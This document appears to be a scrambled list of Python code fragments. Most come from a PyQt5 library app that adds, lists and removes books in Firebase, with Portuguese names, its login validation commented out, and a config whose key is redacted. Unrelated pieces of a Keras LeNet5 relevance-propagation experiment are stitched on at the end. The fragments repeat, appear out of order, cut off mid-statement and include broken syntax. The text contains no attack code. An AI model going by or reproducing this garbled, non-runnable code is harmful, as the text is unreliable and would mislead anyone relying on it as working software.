Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import", "self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase =", "def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro =", "import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from", "= Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo =", "firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId':", "self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def", "import PyQt5 from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox,", "== '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:'''", "{ 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), }", "import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase import", "Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro()", "\"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600)", "QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow()", "= Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo =", "def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def", "import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from", "\"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack =", "listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self):", "self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' :", "self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4)", "= Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def", "def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção',", "from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import", "Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow", "QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2)", "self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5)", "self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0)", "voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor'", "Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2)", "Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro", "self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro()", "Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro", "self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3)", "QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow()", "parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login)", "else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self):", "def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(),", "self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0)", "def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def", "setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 =", "Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class", "self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!')", "self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '':", "\"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget):", "Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow()", "'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1)", "self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo", "from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import", "self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv)", "from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\",", "isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app", "self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5", "self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text()", "self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro =", "as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as", "self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo':", "self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' :", "'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class", "= QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 =", "self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login", "QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login()", "'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def", "self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() ==", "'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro)", "Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro", "Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2", "= QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro()", "self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0)", "def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if", "return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self):", "buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__':", "QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro", "self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro", "= Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo =", "import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as", "Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow", "QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow()", "as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as", "self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self):", "= self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app =", "os from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey':", "import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import", "self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main,", "Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 =", "class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 =", "from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from", "'' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1)", "self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3)", "admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe,", "__init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro)", "'''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos", "def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(),", "'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout()", "self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() ==", "'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId':", "'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self):", "self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4)", ": self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self):", "QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro", "PyQt5 from PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication", "Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow", "self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3", "import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import", "Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self,", "self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result", "QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login", "self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None):", ": self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text()", "cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora'", "self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent)", "from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\",", "= QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 =" ]
[ "optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model,", "print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored in JSON file)", "+ ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1))", "file) file_content = json_file.read() json_file.close() model = model_from_json(file_content) model.load_weights('neural_networks/LeNet5.h5') # Compile the model", "Compile the model before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile", "Rinit = ypred*mask R_inp, R_all = lrpmodel.lrp(Rinit,'alphabeta',3) Rs.append(R_all[-1]) for i in range(len(X_test)): #100", "rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i]) out_row += str(outs[-3][i][j]) +", "out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) + '\\n' rel_row += str(Y_test[i].argmax(axis=-1)) +", "utils import load_MNIST from utils import get_layer_outs_new from utils import filter_val_set from utils", "before using model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w')", "out_row += str(outs[-3][i][j]) + ',' rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1))", "X_test) preds = model.predict(X_test) lrpmodel = read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer()", "prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs = []", "range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i]) plt.clf() plt.plot(range(10),", "# plt.plot(range(10), rel_data) # plt.savefig(\"./plots/plt\"+str(i)+\".png\") ''' for i in range(outs[-3].shape[-1]): out_data = []", "accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for analysis Rs = [] for", "load_layerwise_relevances from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train,", "X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class,", "= load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test, Y_test = filter_val_set(selected_class, X_test, Y_test)", "outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs = get_layer_outs_new(model, X_test) preds", "lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit = ypred*mask R_inp, R_all", "rel_row += str(Rs[i][0][j]) + ',' out_row += str(Y_test[i].argmax(axis=-1)) + ',' + str(preds[i].argmax(axis=-1)) +", "',' + str(preds[i].argmax(axis=-1)) + '\\n' outfile.write(out_row) relfile.write(rel_row) outfile.close() relfile.close() # plt.clf() # plt.plot(range(10),", "[] out_row = '' rel_row = '' for j in range(outs[-3].shape[-1]): #out_data.append(outs[-3][j][i]) #rel_data.append(Rs[j][0][i])", "0 X_train, Y_train, X_test, Y_test = load_MNIST(channel_first=False) img_rows, img_cols = 28, 28 X_test,", "i in range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100 inputs out_data.append(Rs[j][0][i])", "Y_test) relevant_neurons = load_layerwise_relevances('%s/%s_%d_%d_%d' %(experiment_folder, 'LeNet5', 8, #rn selected_class, 7)) #layer print(relevant_neurons) json_file", "#out_data = [] #rel_data = [] out_row = '' rel_row = '' for", "Rs.append(R_all[-1]) for i in range(len(X_test)): #100 inputs #out_data = [] #rel_data = []", "model_from_json from utils import load_MNIST from utils import get_layer_outs_new from utils import filter_val_set", "read('neural_networks/LeNet5.txt', 'txt') # 99.16% prediction accuracy lrpmodel.drop_softmax_output_layer() # drop softnax output layer for", "from lrp_toolbox.model_io import read experiment_folder = 'experiments' selected_class = 0 X_train, Y_train, X_test,", "selected_class, 7)) #layer print(relevant_neurons) json_file = open('neural_networks/LeNet5.json', 'r') #Read Keras model parameters (stored", "''' for i in range(outs[-3].shape[-1]): out_data = [] for j in range(10): #100", "model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) outfile = open('outfile.csv', 'w') relfile = open('relfile.csv', 'w') outs =", "# drop softnax output layer for analysis Rs = [] for inp in", "i in range(len(X_test)): #100 inputs #out_data = [] #rel_data = [] out_row =", "X_test: ypred = lrpmodel.forward(np.expand_dims(inp, axis=0)) mask = np.zeros_like(ypred) mask[:,np.argmax(ypred)] = 1 Rinit =", "as plt from keras.models import load_model, model_from_json from utils import load_MNIST from utils", "analysis Rs = [] for inp in 